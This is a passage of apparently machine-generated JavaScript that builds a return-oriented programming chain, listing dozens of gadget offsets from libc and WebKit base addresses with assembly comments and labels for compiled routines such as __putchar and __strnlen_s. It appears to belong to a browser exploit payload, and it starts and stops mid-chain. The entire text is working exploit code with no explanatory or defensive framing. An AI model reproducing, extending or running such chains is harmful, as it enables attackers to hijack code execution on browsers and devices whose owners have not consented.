//L2560: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2561: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2562: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+169896, //L2564 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2564: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+170024, //L2566 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+170040, //L2567 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+170008, //L2565 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2565: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2566: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2567: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+170200, //L2571 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+170168, //L2569 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+170184, //L2570 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2568: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2569: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2570: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2571: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+170256, //L2573 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2573: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+170384, //L2575 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+170400, //L2576 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+170368, //L2574 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2574: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2575: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2576: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+170480, //L2577 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+170496, //L2578 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2577: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2578: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+170592, //L2580 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+170576, //L2579 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2579: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2580: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L2582: ropchain+170696, //L2581 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+570904, //__putchar //L2581: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L2547: libc_base+764760, //pop rsi ropchain+170808, //L2584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+170792, //L2583 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2583: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2584: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+170912, //L2585 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+170928, //L2586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2585: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2586: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+171048, //L2587 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+171032, //L2588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2588: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2587: db([0, 0]); // 0x0 //__out_fct: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+171120, //L2590 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2590: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+171216, //L2591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+171248, //L2594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L2591: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2593: db([32, 0]); // 0x20 set_gadget(webkit_base+568675,); //pop r8 //L2594: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+171352, //L2597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+171336, //L2595 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2595: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2597: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+171440, //L2598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+171456, //L2600 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2598: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2600: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2601: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+171576, //L2604 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+171560, //L2602 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2602: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2604: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+171664, //L2605 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+171680, //L2607 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2605: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2607: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2608: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+171800, //L2611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+171784, //L2609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2609: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2611: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+171960, //L2615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+171928, //L2613 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+171944, //L2614 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2612: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2613: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2614: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2615: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+172016, //L2617 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2617: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+172144, //L2619 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+172160, //L2620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+172128, //L2618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2618: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2619: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2620: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+172320, //L2624 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+172288, //L2622 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+172304, //L2623 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2621: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2622: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2623: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2624: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+172376, //L2626 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2626: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+172504, //L2628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+172520, //L2629 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+172488, //L2627 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2627: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2628: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2629: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+172632, //L2631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+172680, //L2634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+172648, //L2632 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2631: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2632: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2633: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2634: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+172792, //L2635+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+172784, //L2635 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L2635: db([0, 0]); // 0x0 set_gadgets([ ropchain+172808, //L2635+24 ropchain+175056, //L2630 libc_base+764760, //pop rsi ropchain+172848, //L2636 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2636: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2638: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+172968, //L2641 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+172952, //L2639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2639: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2641: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+173080, //L2642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+173128, //L2645 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+173096, //L2643 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2642: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2643: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2644: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L2645: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+173232, //L2648 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+173216, //L2646 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2646: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2648: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+173376, //L2651 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+173344, //L2649 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+173360, //L2650 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2649: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2650: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2651: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+173456, //L2652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2652: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2654: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+173576, //L2657 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+173560, //L2655 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2655: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2657: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+173736, //L2661 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+173704, //L2659 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+173720, //L2660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2658: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2659: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2660: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2661: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+173792, //L2663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2663: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+173920, //L2665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+173936, //L2666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+173904, //L2664 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2664: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2665: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2666: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+174096, //L2670 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+174064, //L2668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+174080, //L2669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2667: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2668: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2669: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2670: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+174152, //L2672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2672: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+174280, //L2674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+174296, //L2675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+174264, //L2673 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2673: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2674: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2675: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+174376, //L2676 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+174392, //L2677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2676: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2677: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+174488, //L2679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+174472, //L2678 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2678: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2679: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+174568, //L2680 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2680: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2682: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+174688, //L2685 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+174672, //L2683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2683: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2685: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+174768, //L2686 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+174784, //L2687 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2686: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2687: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+174864, //L2689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+174896, //L2691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2689: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L2690: ropchain+175024, //L2688 libc_base+144605 //pop rdi ]); //L2691: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+175000, //L2693 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+175016, //L2692 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2693: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2692: db([0, 0]); // 0x0 //L2688: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L2630: libc_base+764760, //pop rsi ropchain+175136, //L2695 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+175120, //L2694 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2694: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2695: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+175240, //L2696 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+175256, //L2697 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2696: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2697: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+175376, //L2698 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+175360, //L2699 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2699: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2698: db([0, 0]); // 0x0 //__strnlen_s: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+175448, //L2701 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2701: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+175512, //L2703 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2703: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+175584, //L2704 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2704: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2706: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+175704, //L2709 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+175688, //L2707 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2707: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2709: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+175792, //L2710 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+175808, //L2712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2710: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2712: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2713: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+175888, //L2715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2715: db([0, 0]); // 0x0 //L2714: set_gadgets([ libc_base+764760, //pop rsi ropchain+175936, //L2717 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2717: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2719: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+176056, //L2722 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi 